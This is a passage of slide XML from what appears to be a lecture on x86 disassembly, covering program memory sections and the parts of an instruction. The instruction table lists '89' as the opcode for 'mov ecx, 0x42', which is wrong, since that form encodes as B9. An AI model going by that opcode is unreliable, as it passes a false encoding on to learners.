                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:rPr>
                <a:t>Memory</a:t>
              </a:r>
              <a:endParaRPr/>
            </a:p>
            <a:p>
              <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-GB" sz="1800">
                  <a:solidFill>
                    <a:schemeClr val="lt1"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="Calibri"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:rPr>
                <a:t>RAM</a:t>
              </a:r>
              <a:endParaRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="724" name="Google Shape;724;p73"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5004048" y="4394273"/>
              <a:ext cx="728611" cy="330871"/>
            </a:xfrm>
            <a:prstGeom prst="lef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5" name="Google Shape;725;p73"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3132774" y="2420888"/>
              <a:ext cx="57419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CPU</a:t>
              </a:r>
              <a:endParaRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="726" name="Google Shape;726;p73"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="-5400000">
              <a:off x="2750794" y="3749587"/>
              <a:ext cx="450541" cy="313422"/>
            </a:xfrm>
            <a:prstGeom prst="lef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7" name="Google Shape;727;p73"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="-5400000">
              <a:off x="2594901" y="5123372"/>
              <a:ext cx="720080" cy="355669"/>
            </a:xfrm>
            <a:prstGeom prst="lef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8" name="Google Shape;728;p73"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3401379" y="4464789"/>
              <a:ext cx="450541" cy="313422"/>
            </a:xfrm>
            <a:prstGeom prst="lef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29" name="Google Shape;729;p73"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7020272" y="2919984"/>
            <a:ext cx="1944216" cy="3677368"/>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0" name="Google Shape;730;p73"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7164288" y="3429000"/>
            <a:ext cx="1656184" cy="3024336"/>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1" name="Google Shape;731;p73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7236628" y="2919984"/>
            <a:ext cx="15115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Main memory</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="732" name="Google Shape;732;p73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7665815" y="3595304"/>
            <a:ext cx="67717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lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Stack</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="733" name="Google Shape;733;p73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7653793" y="4310506"/>
            <a:ext cx="6767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lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Heap</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="734" name="Google Shape;734;p73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7666672" y="5157192"/>
            <a:ext cx="6671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lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Code</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="735" name="Google Shape;735;p73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7693748" y="5998326"/>
            <a:ext cx="62055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lt1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Data</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="736" name="Google Shape;736;p73"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="7164288" y="4083279"/>
            <a:ext cx="1656184" cy="2"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="lt1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="737" name="Google Shape;737;p73"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="7206203" y="4814840"/>
            <a:ext cx="1656184" cy="2"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="lt1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="738" name="Google Shape;738;p73"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="7204243" y="5858956"/>
            <a:ext cx="1656184" cy="2"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="lt1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="sm" w="sm" type="none"/>
            <a:tailEnd len="sm" w="sm" type="none"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="739" name="Google Shape;739;p73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6407604" y="3399752"/>
            <a:ext cx="6126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LMA</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="740" name="Google Shape;740;p73"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6407604" y="6045497"/>
            <a:ext cx="6591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HMA</a:t>
            </a:r>
            <a:endParaRPr sz="1800">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74"/>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X86 Disassembly</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="746" name="Google Shape;746;p74"/>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chemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="3200"/>
              <a:t>Data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200"/>
              <a:t>This term can be used to refer to a specific section of memory called the </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB" sz="3200"/>
              <a:t>data section</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200"/>
              <a:t>, which contains values that are put in place when a program is initially loaded. These values are sometimes called </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB" sz="3200"/>
              <a:t>static </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200"/>
              <a:t>values because they may not change while the program is running, or they may be called </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB" sz="3200"/>
              <a:t>global </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200"/>
              <a:t>values because they are available to any part of the program.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="448"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="3200"/>
              <a:t>Code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200"/>
              <a:t>Code includes the instructions fetched by the CPU to execute the program’s tasks. The code controls what the program does and how the program’s tasks will be orchestrated.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="448"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="3200"/>
              <a:t>Heap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200"/>
              <a:t>The heap is used for dynamic memory during program execution, to create (allocate) new values and eliminate (free) values that the program no longer needs. The heap is referred to as </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en-GB" sz="3200"/>
              <a:t>dynamic memory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200"/>
              <a:t>because its contents can change frequently while the program is running.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="448"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="3200"/>
              <a:t>Stack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200"/>
              <a:t>The stack is used for local variables and parameters for functions, and to help control program flow. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-209550" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="420"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>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75"/>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X86 Disassembly</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="752" name="Google Shape;752;p75"/>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000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t>Instruction</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-152400" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-152400" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t>Opcodes and Endianness</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-152400" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-152400" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB"/>
              <a:t>Operands</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Immediate: 0x42</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Register: ecx</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="2" marL="1143000" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Memory address: [eax]</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-152400" lvl="0" marL="342900" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="753" name="Google Shape;753;p75"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1619672" y="1700808"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1" firstRow="1">
                <a:noFill/>
                <a:tableStyleId>{D86BE483-798B-4F8A-A1FD-F16CD49BAE18}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2032000"/>
                <a:gridCol w="2032000"/>
                <a:gridCol w="2032000"/>
              </a:tblGrid>
              <a:tr h="370850">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t>Mnemonic</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t>Dest.. Operand</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t>Source operand</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
              </a:tr>
              <a:tr h="370850">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t>mov</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t>ecx</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t>0x42</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="754" name="Google Shape;754;p75"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1619672" y="3212976"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1" firstRow="1">
                <a:noFill/>
                <a:tableStyleId>{D86BE483-798B-4F8A-A1FD-F16CD49BAE18}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2032000"/>
                <a:gridCol w="2032000"/>
                <a:gridCol w="2032000"/>
              </a:tblGrid>
              <a:tr h="370850">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t>Instruction</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t>Mov</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t> ecx</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t>0x42</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
              </a:tr>
              <a:tr h="370850">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t>Opcodes</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1800"/>
                        <a:t>89</a:t>
                      </a:r>
                      <a:endParaRPr sz="1800"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="45725" marB="45725" marR="91450" marL="91450"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
